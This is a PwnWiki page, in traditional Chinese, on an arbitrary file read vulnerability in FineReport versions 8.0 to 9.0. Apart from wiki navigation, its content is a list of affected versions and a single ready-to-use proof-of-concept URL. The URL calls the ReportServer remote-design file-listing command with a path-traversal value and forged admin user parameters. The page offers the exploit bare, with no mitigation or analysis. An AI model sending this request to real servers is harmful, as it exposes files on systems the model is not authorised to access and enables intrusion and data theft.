FineReport v8.0 - 9.0 任意文件讀取漏洞

From PwnWiki

Revision as of 21:00, 12 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（中国大陆）‎

漏洞影響

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true

Retrieved from "https://pwnwiki.com/index.php?title=FineReport_v8.0_-_9.0_任意文件讀取漏洞&oldid=4913"